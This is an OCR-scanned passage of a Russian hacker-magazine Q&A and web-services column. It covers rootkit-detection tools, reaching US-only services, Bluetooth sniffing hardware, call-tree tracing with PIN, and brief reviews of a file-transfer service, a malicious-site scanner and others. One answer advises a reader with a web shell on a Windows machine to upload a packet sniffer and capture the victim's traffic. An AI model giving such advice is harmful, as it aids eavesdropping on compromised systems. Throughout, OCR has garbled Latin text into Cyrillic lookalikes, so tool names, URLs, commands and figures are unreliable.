нужны утилиты-помощники, чтобы упростить 
поиск малвари. Втаком случае есть несколько 
подходящих разработок: 

1.0МЕР ( дтег.пеі ): 

2 . КооіКереаК зііез.доодІе.сот/зііе/ 
гооігереа I ) : 

3. РкІІпЬоокег ( эіі.Іу/сЮУд ВО ). 

Этитулзы примерно похожи: отображают 
скрытые процессы и сервисы, выводятсписок 
скрытых файлов, ключей реестра, драйверов и 
альтернативных потоков ІМТЕ5. Крометого, осу- 
ществляется мониторингсоздания процессов, 
загрузки драйверов и библиотек, использова- 
ния файлов, изменений реестра, активности 
ТСР/ІР-соединений. Определяются перехваты 
в 550Т/ЮТ/ІРР 



О: Какой самый простой и бесплатный 
способ воспользоваться сервисами, 
которые по умолчанию доступны 
только жителям США? Например, 
онлайн-радио Рапсіога ( апсіога.сот) ? 
Понимаю, что очевидным решением 
является работа через американский 
ІР. Но как? Бесплатные тормозные 
прокси-серверы (которые, к тому же, 
возможно установлены на протроя- 
ненных компьютерах) — не вариант. 
Есть ли другие способы? 

А:Хороший вариант— создать на террито- 
рии США свой ѴРЫ- сервис. О том, как это 
сделать бесплатно, ты можешь прочитать 
в нашем материале «Бесплатный ѴРІЧ от 
Атагоп». Вариантом более простым, но 
менее универсальным является исполь- 
зование специальных программ, которые 
туннелируют твой трафик через свои серве- 
ра, тем самым скрывая настоящий ІР-адрес. 
Среди них естьте, которые предоставляют 
такую услугу бесплатно — это в том числе 
Ргее Нісіе ІР ( Ігее-бісіеір.сот ). Программа 
шароварная, но среди бесплатных воз- 
можностей как раз предоставляется работа 
через американские серверы. 

О: У меня есть веб-шелл к виндовой 
машине и возможность загрузить файл. 
Задача — отснифать трафик. При этом 
по понятным причинам у меня нет 
возможности устанавливать дополни- 
тельные библиотеки вроде ѴУ/іпРсар, а 
доступ есть только к командной строке. 
А: Попробуй РаѵѵСар ( пеігезес.сот/ 
?раде=Ва\л/Сар ). Исполняемый файл сни- 
фера весит всего 1 7 Кб, при этом для работы 
не требуется никаких дополнительных 
Ои_-библиотек. В системе только должен 
быть установлен .ЫЕТ Егатеѵѵогк 2.0. Сни- 
фер слушаетлюбые интерфейсы (включая 
ѴѴі-Еі) и сохраняет дамп в рсар-формате. Но 
имей в виду, что под Ѵізіа и ѴѴіпсІоѵѵз 7 могут 
возникнуть проблемы из-за особенностей 
реализации РАѴѴ-сокетов. 

О: Я правильно понимаю, что с обычным 
ВІиеТооіН-адаптером беспроводной 
эфир просто так не прослушаешь? 
Просто взять и запустить его в режиме 
мониторинга (как в случае ѴУ/і-Рі картой) 
не выйдет? 

А: Совершенно верно. В отличие отснифинга 
ѴѴі-Еі, для которого нет проблемы какс со- 
фтом, так и сжелезом, с ВІиеіооіГі ситуация 
непростая. Но ситуация поменялась после 
выступления Майкла Оссмана на конферен- 
ции ЗЬтооСоп 201 1 (видео доклада — ЬІС 
Іѵ/сЦѴѴАзС ). на которой он представил свой 
проект ІІЬегіооіЬ ( иЬегІооіЬ.зоигсеЬгде. 
деі). В чем прорыв? Тут все наглядно. До 
этого момента железо для мониторинга 
ВТ-эфира можно было приобрести за суммы, 
начинающиеся от $1 000. Оцени разницу: 



стоимость изготовления девайса Майкла 
составляет около $100. ІІЬегІооіЬ Опе — это 
дешевый Віиеіооіб-адаптер для осущест- 
вления снифинга ВТ-эфира. На сайте 
разработчика лежат подробные инструкции, 
как собрать такое устройство самому. По 
сути, это ІІЗВ-донгл с возможностью под- 
ключения внешней антенны, построенный 
на процессоре АРМ СогІех-МЗ. Адаптер 
изначально разработан так, чтобы его можно 
было перевести в режим рготізсиоиз, в 
котором возможно пассивно перехватывать 
данные из Віиеіооіб-эфира, передаваемые 
между собой другими девайса ми. Причем 
в качестве программной части можно вос- 
пользоваться привычной намтулзой Кізтеі 
( кізтеіѵуігеіезг.пеі: ). 

О: Ищу инструмент для построения 
карты исполнения кода ѴУ/іпсІоѵѵз- 
приложения в виде дерева вызовов 
различных процедур. 

А: Из последних разработок не могу не от- 
метить пакет инструментов Сосіе Соѵегаде 
Апаіузіз Тооіз ( дііЬиЬ.сот/Сг4зЬ/Сос1е- 
соѵегаде-апаіузіз-іооіз ) от небезызвестного 
Сг4зб’а. Основную задачу по сбору инфор- 
мации выполняет разработанный модуль 
для инструмента РІ N ( іпіооі.ог ), который 
использует динамическую ре компиляцию 
кода для анализа его исполнения. Получить 
карту исполнения кода с помощью этих 
инструментов несложно: 

1. Распаковываем архив РІ N в произвольную 
директорию. 

2 . Копируем Соѵегадег.сИІ в директорию с 
файлами РІ N . 

3. Редактируем сценарий ехесиІе_ріп.Ьа1: 
так, чтобы переменная среды РІІМРАТН со- 
держала актуальный путь до директории РІ N . 

4 . Далее используем ВАТ-сценарий для за- 
пуска целевого приложения: 

ехесиіе_ріп_са1І5.Ьа1: саіс.ехе 

5 . После завершения работы исследуемого 
приложения в текущей директории будет соз- 
дано некоторое количество текстовых файлов 
Соѵегаде0а1:а.1од.<1\1>, где <І\І> — порядковый 
номер потока, который исполнялся в контек- 
сте исследуемого приложения. В этих файлах 
содержится информация о дереве вызовов 
каждого из потоков, но ее нужно перевести в 
формат СаШтее Ргобіе ЕогтаЕ 

руіііоп соѵега§е_1:о_са11ёпарІі.ру \ 

<1о§_1і1е_ра1:Іі> <іІігеасІ_питЬеп> [орііопз] 

6 . После этого мы получим файл Са Ид гі псі.оиі, 
который можно визуализировать с помощью 
программы КсасНедгіпсі ( зоигсеіюгде.пеі:/ 
ргоі есіз/ р гесот рі ІесІ Ьі п ) . 

Подробнее про разработку и нюансы ис- 
пользования читай в блоге автора: езадеіаб. 
ги/Ыод . ~і~ 
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Для поиска малвари на 
сайте 



РІІБНАКЕ 

сіизііагѳ.сот 

©Чтобы передать кому-то большой файл, многие используют одну из 
многочисленных файловых помоек вроде гарібзбаге.сот . позволяющих 
разместитьу себя на серверах что угодно и практически без ограниче- 
ний. Но это не лучший вариант. Избавиться отограничения скорости 
скачивания и просмотра бесконечной рекламы позволяет сервис 
совершенно другого типа. Я говорю о бизбаге. Это не файловый хостинг, 
нет. Используя специальный апплет на Ріазб’е, бизбаге позволяет 
осуществлять передачу между клиентами напрямую (Р2Р), вообще без 
сервера-посредника. Примечательно, что связь можно установить, 
даже если оба клиента работают через файрвол. Скорость при этом 
ограничена лишь шириной их канала. 



ІІРЮІІЕРУ 

игідиегу.пеі 

О Новый сервис для сканирования веб-сайтов в поисках зловредного 
кода, загружающего на клиентские компьютеры малварь. При посеще- 
нии исследуемого ресурса игЮиегу предоставляет полную информа- 
цию о работе браузера, включая скриншот страницы, а также данные 
о выполняемых Оаѵа-скриптах и НТТР-транзакциях. Уже благодаря 
этому зачастую можно сразу понять, заражен ресурс или нет. Однако 
это не все: механизмы сервиса деобфусцируют большинство известных 
сплойт-паков и благодаря сигнатурной базе определяют конкретные 
встроенные в сайтсплойты. Проект пока находится в начальной стадии 
развития, но стремительно обрастает новыми фишками. 




ІЫ5ТАРАРЕР 

іпзіарарег.сот 

©Далеко не всегда есть возможность сразу прочитать интересную ста- 
тью или заметку, замеченную в Сети. Вопрос: как не забыть ее позже? 

Не могу придумать более удобного варианта, нежели тот механизм, 
который предлагает Іпзіарарег. С помощью специального букмаркета 
на панели браузера (кнопка «Веаб 1а1:ег»] можно в один клик сохранить 
интересную статью в базу сервиса. Он сам агрегирует весь контент и 
оформит его таким образом, что ты сможешь не только быстро вернуться 
кчтению сохраненных статей через специальный веб-интерфейс, но и 
распечатать их или просмотреть офлайн на мобильном устройстве (іРаб/ 
іРЬопе, Кіпбіе]. 




ССЮЕСАІМѴОЫ 

собеса пуоп.пеі 

© Если ты занимаешься программированием, то за время реализации 
различных проектов у тебя наверняка накопилось немало различных 
наработок. Их можно повторно использовать, и это большой плюс. Но 
если привести все наработки в презентабельный вид, сделав доступ- 
ны ми для применения другими людьми, то на них вполне можно зара- 
ботать деньги. СобеСапуоп — это магазин готовых сниппетов в области 
веб-разработок Раѵа5сгірЕ РНРЭсгіріз, .ЫЕТ, Ріидіпз, С55, НТМИб] и в 
мобильной области (Ю5, Апбгоіб). Вот тебе пример: сниппет с удачной 
реализацией выпадающего менюна05,ценою$5,был продан 1 065 
раз. Даже сучетом комиссии СобеСапуоп — весьма неплохая прибавка 
к пенсии. Это лишь с одного единственного сценария. 
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